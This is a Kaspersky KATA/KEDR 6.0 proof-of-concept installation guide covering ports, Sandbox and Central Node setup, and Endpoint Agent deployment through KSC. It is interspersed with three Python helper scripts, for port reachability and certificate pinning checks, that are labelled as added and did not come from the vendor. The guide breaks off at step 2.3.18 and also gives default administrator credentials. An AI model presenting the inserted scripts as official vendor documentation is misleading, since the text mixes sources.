Kaspersky Anti Targeted Attack With Kaspersky EDR Expert v6.0 PoC Guide

KATA and KEDR 6.0 Poc Guide

Uploaded by Ahnaf Tahmeed

KATA & KEDR v.6.0: PROOF OF CONCEPT GUIDE
TABLE OF CONTENTS
History of changes (p. 3)
Introduction (p. 4)
  Who is this guide for? (p. 4)
  KATA & KEDR (p. 4)
KEDR main functionality (p. 5)
  KATA & KEDR deployment scenarios (p. 7)
1. Environment preparation (p. 9)
  1.1. Ports and update/KSN servers (p. 9)
  1.2. Windows event log events list (p. 10)
  1.3. KATA hardware requirements (p. 11)
  1.4. Download the distributives (p. 11)
2. KATA/EDR installation (p. 13)
  2.1 Sandbox installation (p. 13)
  2.2 Central Node with Sensor installation (p. 23)
  2.3 Standalone Endpoint Agent installation and configuration using KSC Web UI (p. 35)
  2.4 Installing KES with built-in EDR Agent on Apple macOS platform (p. 44)
Conclusion (p. 51)
Appendix A: KPSN integration (p. 52)
Appendix B: Kaspersky Security for Mail Gateway (KSMG) integration (p. 54)
Appendix C: Kaspersky Web Traffic Security (KWTS) integration (p. 55)
Appendix D: KATA/KEDR testing (p. 56)
Appendix E: Endpoint Agent installation and configuration using KSC MMC UI (p. 70)
Appendix F: Installing Kaspersky Endpoint Agent for Linux (p. 78)
Appendix G: Custom VM creation (p. 83)

KATA & KEDR 6.0: POC Guide


HISTORY OF CHANGES
Date Description

14.12.2020 Testing scenarios were added

19.05.2022 Updated to reflect changes in KATA\KEDR 4.0

30.12.2022 Updated to reflect changes in KATA\KEDR 4.1

17.03.2023 Updated to reflect changes in KATA\KEDR 5.0

24.05.2023 Updated to reflect changes in KATA\KEDR 5.1

29.12.2023 Updated to reflect changes in KATA\KEDR 6.0

09.02.2024 FTP-links were updated.

INTRODUCTION
WHO IS THIS GUIDE FOR?
This guide is designed to help you quickly deploy and configure Kaspersky Anti Targeted Attack Platform (KATA)
and Kaspersky Endpoint Detection and Response (KEDR) for evaluation. It guides you through detailed scenarios in
a Proof of Concept environment to help you better understand how KATA/EDR works.
The target audience includes Kaspersky presales engineers and third parties wishing to evaluate KATA.
It is assumed that the reader will:
1. Have prior knowledge of Linux-based OSs.
2. Possess experience as a system administrator or technical reviewer.
3. Be familiar, at least at a conceptual level, with Kaspersky products and technologies.

KATA & KEDR


Note: For more detailed information please refer to KATA&KEDR 6.0 Online Help:

https://support.kaspersky.com/KATA/6.0/en-US/246841.htm

KATA functionality
KATA comprises three main components:

• Network Sensor - responsible for collecting and pre-processing mail/web/network traffic. When using NAT,
you’ll need to ensure that traffic is transmitted to the sensor before it is broadcast, to avoid spoofing IP
addresses in the analyzed traffic.
• Central Node - aggregates information from endpoint agents, as well as being responsible for assessing and
classifying threats by their severity level, accumulating an incident database, and providing data visualization
and reporting tools.
• Sandbox - allows you to automatically run and learn about potentially dangerous objects (files and links) in
parallel on isolated virtual machines. To increase system performance, Sandbox can be scaled by combining
multiple instances into a cluster without having to expand an existing license.
The following components are also included in KATA:

• Endpoint Agent – agents that collect information about processes and network activity at the level of
workstations and servers. They’re implemented in two versions: as an independent agent and as an agent
in Kaspersky Endpoint Security for Windows.

• Web console – a tool for monitoring and studying the results of analysis conducted by KATA. The
component is implemented as a web server on the Central Node, to which you can connect using any
popular web browser.

KATA analyzes the following types of information flow:

• Mirrored Network Traffic (SPAN/ RSPAN / ERSPAN / TAP) of a network segment for users with internet
access. Traffic includes information on internet interactions by corporate network hosts. Traffic processing
is performed, as well as the extraction and further analysis of objects (files and links) and metadata for the
HTTP, HTTP2, FTP, SMTP, DNS, SMB, and NFS protocols.
• Data from proxy servers that supports the transfer of objects (files and links) to third-party systems using
the ICAP protocol. Note that if the proxy server can replace SSL certificates then KATA can, for example,
analyze encrypted traffic for the HTTPS protocol.
ICAP integration with feedback can work in two modes:

▪ Standard scan. In standard scan mode, the object is scanned by all supported technologies. While
being scanned by the Sandbox component, the object remains available. If a threat is detected, the
object is blocked.
▪ Advanced scan. In the advanced scan mode, objects are scanned by all supported technologies.
While being scanned by the Sandbox component, the object is not available. If a threat is detected,
the object is blocked.
• Copies of mail messages via POP3 / POP3S / SMTP protocols.
• Mail messages through integration with Kaspersky Linux Mail Server (KLMS)/Kaspersky Security Mail
Gateway (KSMG). Note that if KLMS or KSMG mail gateways are integrated with KATA, unsafe mail messages
and/or their components (links / attachments) can be blocked prior to delivery to users by applying an
additional level of analysis in the KATA Sandbox component.
• Telemetry from critical workstations and servers. Endpoint Agent (included in the Kaspersky Endpoint
Security for Windows application, or can be installed as a separate module) can be installed on workstations
and servers. Endpoint Agent constantly monitors processes, open network connections and mutable files
on the host. After collecting telemetry, Endpoint Agent sends this data to the Central Node for analysis and
correlation with Indicators of Attack (“IoAs” or “hunts”) and the MITRE ATT&CK matrix. IoA rules are created
by Kaspersky experts and delivered with updates. (This component is available with the KEDR license.)
KATA analyzes objects using the following technologies:

• AM - «Anti-malware Engine» - used in the Central Node.


• Sandbox – a virtual execution environment «Advanced Sandbox», which detects suspicious and malicious
activity in objects (emails, documents, executable files, etc.) based on the analysis of their behavior in a
virtual environment: version 5.1 has the following options:
▪ Windows 7, Windows 10.
▪ CentOS 7.8, Windows 7, Windows 10.
▪ Astra Linux 1.7, Windows 7, Windows 10.
▪ Custom
• Intrusion Detection System - used with a set of unique rules, which are created by Kaspersky experts based
on analysis of the malware and APT module’s network communications.
• YARA Engine - analyzes file content based on the user’s custom logic.
• URL Reputation – a technology containing records on malicious and phishing hosts, C2-servers, APT-related
hosts, etc.
• Mobile Attack Analyzer - a cloud-based technology which can analyze APK files. As a result, the user
receives an AM detect.

KEDR MAIN FUNCTIONALITY


Data collection in telemetry from hosts:

• The agent for Windows collects and sends the following list of events to the Central Node:
o Process started
o Module loaded
o Connection to remote host
o Prevention rule
o Document blocked
o File changed
o System event log
o Registry modified
o Port listened
o Driver loaded
o Process: interpreted file run

o Process: console interactive input
• The Agent for Linux collects and sends the following list of events to the Central Node:
o File modified.
o Process started.
o System event log.
o Scan: detect.
o Scan: detect processing result.
• A Threat Hunting page is created in the web console, allowing the security officer to search through
collected telemetry.
Detection, through:

• IoA alerts
• Scheduled IoC host scanning
Automated Prevention:

• Software launch blocking
• Script launch blocking
• Documents launch blocking
• New rule can be created from an alert page or ‘Threat Hunting’ event, or taken from the list of prevention
rules
Response features:

• The following actions are implemented actively on the agent for Windows:
o Get data:
• Forensics;
• NTFS metafiles;
• Registry key;
• Process memory dump;
• Memory dump;
• Disk image;
• File;
o Kill Process
o Start YARA scan
o Run program - run a program or cmd command.
o Delete File
o Quarantine File/Restore File
o Service management
o Host Isolation
• The following actions are implemented actively on the agent for Linux:
o Get file
o Run program
o Delete file
o Kill Process
o Isolate host
• By default, files collected and quarantined files are analyzed on the Central Node using the following
technologies: Anti-Malware Engine, YARA, Sandbox.

KATA & KEDR DEPLOYMENT SCENARIOS
1. Standard deployment:

Figure 1: standard configuration of KATA/EDR

2. KATA/KEDR with Standalone Sensor deployment scenario:

Figure 2: KATA/EDR two-server deployment (figure labels: Files extracted from traffic; ‘IDS’ and ‘URL Reputation’ detects; EDR telemetry)

1. ENVIRONMENT PREPARATION
1.1. PORTS AND UPDATE/KSN SERVERS
Open the following ports (Source / Direction / Port / Protocol / Purpose):

Central Node, inbound:
  22 TCP              server connection via SSH
  443 TCP             receiving data from KEA and Kaspersky gateways (KSMG, KWTS)
  8443 TCP            Web UI
  53 UDP              communication with the server with the Sensor component
  9081 TCP            receiving data from Sensor components installed on standalone servers

Central Node, outbound:
  80, 443, 1443 TCP   communication with KSN and Kaspersky Update servers
  443 TCP             communication with the Sandbox component
  601 TCP             syslog via TCP

Sensor, inbound:
  22 TCP              server connection via SSH
  1344 TCP            ICAP server, for proxy server integration
  25 TCP              SMTP server, for mail server integration
  443 TCP             port for proxying telemetry from KEA to CN
  53 UDP              communication with the server with the Central Node component

Sensor, outbound:
  80, 443 TCP         communication with KSN and Kaspersky Update servers
  995/110 TCP         POP3s/POP3 integration
  9081 TCP            forwarding traffic to the server with the Central Node component
  53 UDP              communication with the server with the Central Node

Sandbox (management interface), inbound:
  22 TCP              server connection via SSH
  443 TCP             receiving objects to scan from CN
  8443 TCP            Web UI

Sandbox (management interface), outbound:
  80, 443 TCP         communication with KSN and Kaspersky Update servers

Sandbox (malware interface), outbound:
  Internet access     side channel without access to corporate network infrastructure

Note: If you are deploying the Central Node and Sensor servers in separate subnets separated by other network
devices such as firewalls, make sure that in addition to the ports listed above, IP protocols with ID 50 and ID 51 are
allowed between the Sensor and the Central Node (required for IPSEC connection between Sensor and Central
Node).
Note: If you install a second network interface that receives only mirrored traffic in a VMware ESXi virtual
environment, use the E1000 network adapter or disable the LRO (large receive offload) option on a VMXNET3
network adapter.
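Before installing anything it pays to confirm that the firewall actually permits the flows in the table above. The following Python pre-flight check is an added example, not part of the guide or of the Kaspersky product; it only probes TCP ports (the UDP/53 and IP protocol 50/51 requirements must be verified on the firewall itself), and the host names in the sample matrix are placeholders that you replace with your PoC addresses.

```python
"""Pre-flight TCP reachability check for a KATA/KEDR PoC (added example).

Hosts in the sample matrix are placeholders, not addresses from the guide.
Only TCP flows are probed; UDP/53 and IP protocols 50/51 (IPsec between
Sensor and Central Node) cannot be verified with a plain connect().
"""
import socket
from typing import List, Tuple

# Constructed sample matrix built from the guide's port table: (label, host, port).
# Replace the placeholder hosts with the real PoC addresses; run this from the
# Central Node to verify its outbound requirements.
CENTRAL_NODE_OUTBOUND: List[Tuple[str, str, int]] = [
    ("Sandbox component", "sandbox.poc.example", 443),
    ("KSN / update servers", "ksn-crypto-file-geo.kaspersky-labs.com", 443),
    ("Kaspersky update servers", "antiapt.kaspersky-labs.com", 80),
    ("Syslog collector (optional)", "syslog.poc.example", 601),
]


def check_tcp(host: str, port: int, timeout: float = 3.0) -> Tuple[bool, str]:
    """Try a TCP connect and report (reachable, reason).

    DNS failures, timeouts (a filtered port) and refusals (a closed port) are
    reported separately because they point at different fixes: DNS settings,
    firewall policy, or a service that is not running yet.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True, "connected"
    except socket.gaierror as exc:
        return False, f"dns: {exc}"
    except socket.timeout:  # filtered by a firewall or host down
        return False, "timeout"
    except OSError as exc:  # e.g. ECONNREFUSED, ENETUNREACH
        return False, f"unreachable: {exc.strerror or exc}"


def preflight(targets: List[Tuple[str, str, int]], timeout: float = 3.0):
    """Probe every (label, host, port) tuple; return rows with the check result."""
    results = []
    for label, host, port in targets:
        ok, reason = check_tcp(host, port, timeout)
        results.append((label, host, port, ok, reason))
    return results


def failures(results):
    """Rows whose connect attempt did not succeed."""
    return [row for row in results if not row[3]]


if __name__ == "__main__":
    rows = preflight(CENTRAL_NODE_OUTBOUND)
    for label, host, port, ok, reason in rows:
        print(f"{'OK ' if ok else 'FAIL'} {label:<28} {host}:{port}  {reason}")
    raise SystemExit(1 if failures(rows) else 0)
```

Run it once per component with that component's outbound rows (Sensor to Central Node on 9081, Central Node to Sandbox on 443, and so on); a non-zero exit code makes it easy to gate the rest of the PoC checklist on it.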

Update and KSN servers:

Updates:
  http://antiapt.kaspersky-labs.com
  http://antiaptcdn.kaspersky-labs.com

KSN:
  https://ksn-crypto-file-geo.kaspersky-labs.com
  https://ksn-crypto-stat-geo.kaspersky-labs.com
  https://ksn-crypto-url-geo.kaspersky-labs.com
  https://ksn-crypto-verdict-geo.kaspersky-labs.com
  https://ksn-crypto-kas-geo.kaspersky-labs.com
  https://ksn-crypto-a-stat-geo.kaspersky-labs.com
  https://ksn-crypto-hash-geo.kaspersky-labs.com
  https://ksn-his-geo.kaspersky-labs.com

1.2. WINDOWS EVENT LOG EVENTS LIST


The EDR agent is able to process a number of Windows event log events. In order to parse Windows event log
events, their audit must be enabled. A short list of supported event IDs can be found in the Threat Hunting builder.

1.3. KATA HARDWARE REQUIREMENTS
Review KATA’s requirements to make sure that the PoC environment meets them all. The requirements are given in
this sizing guide:
Make sure that the servers are within the local network in accordance with the deployment scenario.
Documentation is available at: https://support.kaspersky.com/KATA/6.0/en-US/246841.htm

If EDR agents are used, make sure that the EDR agents are compatible with the OS:
• Windows:
a. https://support.kaspersky.com/KEA/3.16/en-US/193103.htm
b. https://support.kaspersky.com/help/KESWin/12.3/en-US/127972.htm
• Linux: https://support.kaspersky.com/KES4Linux/11.4.0/en-US/245117.htm
• MacOS: https://support.kaspersky.com/kes-for-mac/12.0/118665

Minimum hardware requirements:


Component Hardware Requirements

Central Node 6 vCPU, 26 GB RAM, 1 TB RAID10 + 1 TB RAID10

Sensor 4 vCPU, 16 GB RAM, 300 GB RAID1

Sandbox (Virtual) 32 vCPU, 32 GB RAM, 300 GB RAID1

1.4. DOWNLOAD THE DISTRIBUTIVES


Distributives and documentation: https://confluence.kaspersky.com/pages/viewpage.action?pageId=1344846696

2. KATA/EDR INSTALLATION
Procedure for installing program components

Perform the program installation steps in the following sequence:


1. Install the Sandbox component.
2. Add the VM images to the Sandbox component.
3. Install the Central Node and Sensor components according to the program deployment and installation
scenario.
4. Install the Kaspersky Endpoint Agents on computers that belong to the corporate IT infrastructure.

If you’re using the standard deployment scenario, install the Central Node with the embedded Sensor on one
server and Sandbox on another one.

If you are using the deployment scenario with a standalone Sensor component, install the solution components in
the following order:
1. Install the Central Node component on the first server.
2. Install the Sensor component on the second server or on several servers.
3. Install the Kaspersky Endpoint Agents on computers that belong to the corporate IT infrastructure.

2.1 SANDBOX INSTALLATION


First of all, check the prerequisites https://support.kaspersky.com/help/KATA/6.0/en-US/247180.htm.
On the virtual machine:
1. Nested virtualization enabled! (a common mistake).
2. Latency Sensitivity option set to High.
3. Entire RAM is reserved.
4. Entire CPU frequency is reserved.
To enable nested virtualization in VMware vSphere, see here: https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.vm_admin.doc/GUID-2A98801C-68E8-47AF-99ED-00C63E4857F6.html

In addition, it is strongly recommended to use a dedicated Internet(malware) interface.

2.1.1. Click Ok to start the Sandbox.

2.1.2. Select the license agreement language.

2.1.3. Accept both license agreements by clicking on I accept.

2.1.4. Select the disk drive for system installation.

2.1.5. Confirm installation on the selected drive by clicking Install….

2.1.6. Wait until the necessary files are unpacked.

2.1.7. Set the host name, then click Ok.

2.1.8. Select the management interface, then click <Enter>.

2.1.9. Set the IP address and mask of the management interface, then click Ok.

2.1.10. Select New to add a DNS server, then click <Enter>.

2.1.11. Specify the DNS server, then click Ok.

2.1.12. Select Go back to continue.

2.1.13. Select New in order to add a route.

2.1.14. Add route details.
Note: this route is for the management interface.

2.1.15. Select Continue to proceed with installation.

2.1.16. Enter your preferred minimum password length, then click Ok.

2.1.17. Enter your administration account details, then click Ok.

2.1.18. Press <Enter>

2.1.19. Press <Enter> to continue, then continue tuning KATA Sandbox in the web UI.

2.1.20. Connect to the Sandbox web interface, example: https://10.10.20.151:8443. Use the credentials which were set in step 2.1.17.

Creating virtual machines with preset images of operating systems from the distribution kit

2.1.21. Go to the Templates&Storage -> Templates tab. Click on Add and choose Import template.

2.1.22. Select the appropriate image from the distribution kit and click Open.

2.1.23. Wait until uploading is completed. To upload the other images, repeat this step.
Note 1: Read additional important information about selecting operating systems: https://support.kaspersky.com/help/KATA/6.0/en-US/246744.htm
Note 2: If the network connection between the endpoint used to connect to the web interface and the Sandbox is poor, timeouts and transport errors may be observed during image upload. If this is an issue, use the method described in steps 2.1.28-2.1.35 for upload, then create VMs by following step 2.1.24.

2.1.24. Choose a particular template (by clicking on it). Click Create VM to create the particular VMs for the sample analysis. Grab a coffee, the process will take some time.

2.1.25. For Windows OS images, click Accept to accept the EULA.

2.1.26. Repeat steps 2.1.21-2.1.25 for other images. After the VMs finish unpacking, go to the Virtual machines section and install them by clicking Install ready VMs.

2.1.27. Set the maximum number of guest VMs. (When installing the Sandbox component on a VMware ESXi virtual machine, you must set the limit for simultaneously running virtual machines to 12 (change the value from 48 to 12). See details: https://support.kaspersky.com/help/KATA/6.0/en-US/247180.htm.)
After all required VMs are installed, jump to step 2.1.36.

2.1.28. For cases with a poor network connection you may use SFTP to upload VM images to the platform.
Note: SFTP is disabled by default. To enable it, connect to Sandbox via SSH (e.g. via PuTTY) and enter <Technical Support Mode>.

2.1.29. Switch to the root user by command
sudo -i
(use the same password as for SSH).

2.1.30. Execute
vi /etc/ssh/sshd_config

2.1.31. Type
:?Force
and click <Enter>.

2.1.32. You need to comment out the line
ForceCommand /usr/bin/apt-restricted-ssh
Click on <Esc> then click on the <I> button.

2.1.33. Put # before the ForceCommand line, then click on <Esc>, then write :wq and click on <Enter>.

2.1.34. Restart the SSH service:
systemctl restart sshd

2.1.35. Connect to Sandbox with the scp client and upload all images to /var/opt/kaspersky/apt/files

2.1.36. Set the date and time in the Date and Time tab.
Note: If possible, specify an NTP server.

2.1.37. Open the Network Interfaces tab, set Host name, DNS settings, and Management and Internet (malware) interface settings.
Note: The malware interface is strongly recommended. If you don’t have one for the current PoC, just enter some fake network settings (e.g. ip: 1.1.1.2, mask 255.255.255.0, gateway: 1.1.1.1).
2.1.38. Set Static Routes if needed.

2.1.39. Wait for a couple of seconds for the system pop-up to reboot the Sandbox in order to apply these settings.

2.2 CENTRAL NODE WITH SENSOR INSTALLATION

2.2.1. Select a language, choose <OK> and press <Enter>.

2.2.2. Select <I accept>, then select <OK> and press <Enter> to accept the license agreement.

2.2.3. Select <I accept>, then select <OK> and press <Enter> to accept the privacy policy.

2.2.4. Select <single>, then select <OK> and press <Enter> to continue.

2.2.5. Select <OK> and press <Enter> to continue.

2.2.6. Select <yes> and press <Enter> to continue.

2.2.7. Leave the default settings (198.18.0.0/16) and press <Enter>.

2.2.8. Leave the default settings (198.19.0.0/16) and press <Enter>.
The installation continues.

2.2.9. Choose the external interface and press <Enter>.

2.2.10. Change the type of the interface to Static.

2.2.11. Specify IP configuration, choose Save and press <Enter>.

2.2.12. Specify minimum password length, then choose Ok and press <Enter>.

2.2.13. Enter admin (CLI and Web UI) account details, then choose Ok and press <Enter>.

2.2.14. Specify the IP address of a DNS server, then press <Enter> twice.

2.2.15. Enable traffic capturing capabilities (if applicable): type <y> then press <Enter>. Otherwise type <n> then press <Enter>.

2.2.16. Specify NTP server, then press <Enter> twice.

2.2.17. You will see the CLI Login Page.

2.2.18. Go to the KATA Central Node web interface, for example: https://10.10.20.199:8443.
First of all, you must specify the sizing settings.
Tick the Local administrator option, enter the administrator user name "admin" and the password that was specified during step 2.2.13.

2.2.19. Now you see the Server configuration page.

2.2.20. Specify your parameters then click Configure.

2.2.21. Click Start.

2.2.22. Wait until the server configuration is completed.

2.2.23. After the configuration is complete you will be prompted to log in. Log in as the default regular Administrator.
Enter the administrator user name Administrator and the default password Administrator, then click Log in.

2.2.24. Now you see the Administrator’s console.

The next steps describe connecting the CN to the Sandbox

2.2.25. Go to Sandbox servers then click Add.

2.2.26. Specify the IP address of the Sandbox component. Click Get certificate fingerprint.

2.2.27. The workspace displays the fingerprint of the certificate of the server with the Sandbox component.

2.2.28. Compare the obtained certificate fingerprint with the fingerprint indicated in the Sandbox web interface in the KATA Authorization section in the Certificate fingerprint field. If the certificate fingerprints match, perform the next steps of the instructions. For security reasons, if the certificate fingerprints do not match, confirming the connection is not recommended. Make sure the data you entered is correct.

2.2.29. Go back to the web interface of the Central Node.
In the Name field, specify the Sandbox component name that will be displayed in the web interface of the Central Node component. Select the Enable check box.
Click Add.

2.2.30. Make sure the authorization status is Request sent.

2.2.31. Select the Settings section in the web interface of the Central Node. Next select the Certificates section. Pay attention to the certificate fingerprint of the Central Node.

2.2.32. Go back to the KATA Authorization page of the Sandbox web interface. Refresh the page. Compare the certificate fingerprint of the Central Node with the fingerprint indicated in the Sandbox web interface. If the certificate fingerprints match, click Accept. For security reasons, if the certificate fingerprints do not match, accepting the connection is not recommended.

2.2.33. Click Yes to save changes.

2.2.34. Go back to the web interface of the Central Node.
Check the state of the authorization (it must be Approved) and make sure the Sandbox is enabled.
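The mutual fingerprint comparison in steps 2.2.28 and 2.2.32 is what stops a man-in-the-middle from inserting itself between Central Node and Sandbox, so it is worth having a second, independent reading of each fingerprint. The following Python helper is an added example and not part of the guide or the product: it fetches the certificate a host presents on a given TLS port and compares its fingerprint with the value shown in the web interface, tolerating the colon/case formatting differences that cause false alarms. It assumes the fingerprint shown in the UI is a SHA-256 digest of the DER certificate served on that port (pass a different algorithm name if the UI says otherwise); host and port values are placeholders.

```python
"""Out-of-band TLS certificate fingerprint check (added example).

Assumption: the fingerprint shown in the KATA/Sandbox web interface is the
SHA-256 digest of the DER-encoded certificate served on the queried port.
If the UI labels it differently, pass that algorithm name instead.
"""
import hashlib
import hmac
import socket
import ssl


def fetch_der_certificate(host: str, port: int = 8443, timeout: float = 5.0) -> bytes:
    """Return the DER certificate presented by host:port.

    Chain verification is deliberately disabled: the appliance certificate is
    self-signed, and the whole point is to fetch it and compare its fingerprint
    against the value read from the other component's UI.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def fingerprint(der: bytes, algorithm: str = "sha256") -> str:
    """Colon-separated upper-case hex digest, the common UI presentation."""
    digest = hashlib.new(algorithm, der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def normalize(fp: str) -> str:
    """Strip separators and whitespace so 'ab:cd' and 'AB CD' compare equal."""
    return "".join(ch for ch in fp.upper() if ch in "0123456789ABCDEF")


def fingerprints_match(shown: str, fetched: str) -> bool:
    """Constant-time comparison of two fingerprints in any common formatting."""
    a, b = normalize(shown), normalize(fetched)
    return len(a) > 0 and hmac.compare_digest(a, b)


def verify(host: str, port: int, expected: str, algorithm: str = "sha256"):
    """Fetch the live certificate and compare; return (match, fetched_fingerprint)."""
    fetched = fingerprint(fetch_der_certificate(host, port), algorithm)
    return fingerprints_match(expected, fetched), fetched


if __name__ == "__main__":
    # Placeholder values; replace with the Sandbox address and the fingerprint
    # shown in the KATA Authorization section of its web interface.
    ok, seen = verify("10.10.20.151", 8443, "<fingerprint copied from the Sandbox UI>")
    print("MATCH" if ok else "MISMATCH - do not confirm the connection", seen)
```

Run it from a third host (an administrator workstation) against both the Sandbox and the Central Node; a mismatch against what either web interface displays is exactly the situation the guide says not to confirm.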

2.2.35. Go to the Settings tab.
Under OS set, select one of the options, then click Apply.
Note: remember, on the Sandbox’s side all types of the VMs should already be installed. See additional information here: https://support.kaspersky.com/help/KATA/6.0/en-US/246744.htm

The next steps describe the installation of license keys

2.2.36. In the web interface of the Central Node go to Settings -> License. Click Import in the KATA or KEDR section (depending on your needs).

2.2.37. Choose an appropriate license key.

2.2.38. Read the KSN statement. Choose I
agree to participate in KSN and click
Apply.

2.2.39. If applicable, repeat steps 2.2.36-2.2.38 to download a license key. Have a look at the example of installed keys in the picture.

Optional. Configuring the receipt of mirrored traffic from SPAN ports

2.2.40. In the web interface of the Central Node go to the Sensor servers section. The Server list table will be displayed. Select the Sensor component.

2.2.41. Select the SPAN traffic processing section. The Network interfaces table is displayed.

2.2.42. In the row of the network interface from which you want to configure the receipt of mirrored traffic, set the toggle switch in the SPAN traffic scanning column to Enabled.
In the Capture thread drop-down list, select the stream that will process this network interface.
In the Select CPU drop-down list, select the processor that will process the network traffic.
Click Apply.
The receipt of mirrored traffic from SPAN ports will be configured.
Note: If you use virtual machines, make sure the virtual machine with KATA and the virtual machine with the workstation are running on the same hypervisor host.

2.3 STANDALONE ENDPOINT AGENT INSTALLATION AND CONFIGURATION USING KSC WEB UI
Installation and configuration can be done from KSC or locally (CLI or cmd)
https://support.kaspersky.com/help/KEA/3.16/en-US/199051.htm

Note: The following steps describe the installation on Windows machines.

2.3.1. The first step is to upload the KEDR license to the KSC:
Login to KSC Web Console.
Go to Operations -> Licensing -> Kaspersky licenses and click Add.
Then choose Add key file, select the license key file and check Automatically distribute license key to managed devices. Save the license.

2.3.2. Install the Kaspersky Endpoint Agent Management web plug-in on the KSC Web Console. See the detailed instructions here: https://support.kaspersky.com/help/MDR/KEALinux/en-US/200778.htm

2.3.3. Download the Kaspersky Endpoint Agent

2.3.4. Login to the Central Node as an Administrator.
Go to Settings -> Certificates and download the Server Certificate by clicking Export (the kata.crt file will be downloaded).
Optionally: For additional host-based security, enable Validate Endpoint Agent TLS certificates and generate the Endpoint Agent certificate (ATTENTION! The agent_cert_xxxx.pfx file will be downloaded automatically).

2.3.5. Go to the KSC Web console.
Create the KEA installation package: Deployment & Assignment -> Installation Packages -> + Add.

2.3.6. Select Create an installation package from a file, then click Next.
Set a name for this installation package.
Click Browse, select the downloaded zip archive from klbox and click Open.
Then click Next.

2.3.7. To accept the EULA and privacy terms, scroll down to the bottom, then tick I accept Privacy policy and accept EULA.
Then click Next -> OK.

2.3.8. The next step is to install KEA:
Go to Devices -> Tasks -> Add.

2.3.9. Set New task properties:
o Application: Kaspersky Security Center 14
o Task type: Install application remotely
o Task name: Your choice
Assign the task according to the deployment scenario accepted on the PoC and click Next.
Note: in this guide we will use manual selection of hosts to install KEA.

2.3.10. Choose devices to install KEA, click Add, tick the selected devices, then click Next.

2.3.11. Choose the installation package and the Network Agent.
Check Using Network Agent, then click Next.
Answer the questions, select user accounts to access the systems.
Click Finish to complete creating the task.

2.3.12. Go to Devices->Tasks. Choose created
task, then click Start.

2.3.13. Wait until the task has successfully completed.

2.3.14. The next step is to create your policy.
Go to Devices -> Policies & Profiles -> <Add>.
In the New Policy Wizard select <Kaspersky Endpoint Agent>.
Click <Next>, and then <Next> again on the following screen.


2.3.15. Check the KATA EDR option and click
Next.

2.3.16. On the next step set the policy status to Active and switch to the Application settings tab to configure the connection between KEA and the KATA Central Node.

2.3.17. To set up the connection to the KATA Central Node, on the Application settings tab go to Telemetry collection servers -> KATA integration.
Tick the Enable KATA integration option.
Add the Central Node connection address and port (TCP port 443 is the default).
Recommended: to prevent man-in-the-middle attacks, tick Use pinned certificate to secure connection, click Add New TLS Certificate, click Upload, choose the kata.crt file downloaded at step 2.3.4, click Open and then OK. With the certificate pinned the agent only completes the TLS handshake with a Central Node that presents exactly this certificate; a substituted server certificate makes the connection fail instead of silently redirecting telemetry.
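The following Python script is an added example for this page, not part of the original guide or of any Kaspersky product. It shows the check that pinning relies on: compute the SHA-256 fingerprint of the exported kata.crt and compare it with the fingerprint of the certificate the Central Node actually presents on TCP/443, which is how you verify out-of-band that the file you are about to pin (or the fingerprint KWTS shows you in Appendix C) belongs to the node you expect and not to something in the path. The host/IP and port are assumptions supplied by the caller; the PEM constants are constructed test data, not real certificates.

```python
"""Added example (not Kaspersky code, not from the guide): out-of-band check
that the certificate a KATA Central Node presents on TCP/443 is the same
kata.crt exported in step 2.3.4, by comparing SHA-256 fingerprints of the
DER encoding. Host/IP and port are assumptions supplied by the caller."""
import base64
import hashlib
import hmac
import re
import socket
import ssl
import sys

PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)

# Constructed test data, NOT real certificates: the "DER" payload is just the
# bytes b"abc" / b"abd" in PEM armour, enough to exercise the parsing path offline.
CONSTRUCTED_PEM_A = "-----BEGIN CERTIFICATE-----\nYWJj\n-----END CERTIFICATE-----\n"
CONSTRUCTED_PEM_B = "-----BEGIN CERTIFICATE-----\nYWJk\n-----END CERTIFICATE-----\n"


def pem_to_der(pem: str) -> bytes:
    """Extract the first CERTIFICATE block from PEM text and base64-decode it."""
    m = PEM_RE.search(pem)
    if not m:
        raise ValueError("no CERTIFICATE block found in PEM input")
    return base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)


def der_fingerprint(der: bytes) -> str:
    """SHA-256 fingerprint as colon-separated upper-case hex, the form shown by
    openssl x509 -fingerprint -sha256, browsers and the KWTS confirmation dialog."""
    digest = hashlib.sha256(der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def pem_fingerprint(pem: str) -> str:
    return der_fingerprint(pem_to_der(pem))


def pin_matches(pinned_pem: str, presented_pem: str) -> bool:
    """True only if the presented certificate hashes to the pinned fingerprint.
    Line-ending or whitespace differences in the PEM do not matter because the
    comparison is made on the decoded DER bytes."""
    return hmac.compare_digest(pem_fingerprint(pinned_pem), pem_fingerprint(presented_pem))


def fetch_server_cert_pem(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Fetch the leaf certificate the server presents. Chain verification is
    deliberately off: we want to see whatever is actually on the wire (including
    an interceptor's certificate) and judge it by the pin, not by a CA store."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    return ssl.DER_cert_to_PEM_cert(der)


def check_central_node(host: str, pinned_pem: str, port: int = 443) -> bool:
    """Compare the exported kata.crt with what the node serves; print both fingerprints."""
    presented = fetch_server_cert_pem(host, port)
    ok = pin_matches(pinned_pem, presented)
    print(f"pinned    {pem_fingerprint(pinned_pem)}")
    print(f"presented {pem_fingerprint(presented)}")
    print("MATCH: safe to pin this kata.crt" if ok else "MISMATCH: do not deploy this kata.crt")
    return ok


if __name__ == "__main__" and len(sys.argv) == 3:
    # Usage: python pin_check.py kata.crt <central-node-ip>   (the IP is an assumption)
    with open(sys.argv[1]) as f:
        check_central_node(sys.argv[2], f.read())
```

Run it from a host that reaches the Central Node on 443 before uploading kata.crt to the policy; a mismatch means either the export came from a different node or something is terminating TLS between you and it, and in both cases the file must not be pinned.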

2.3.18. In the List of KATA servers section click Add.

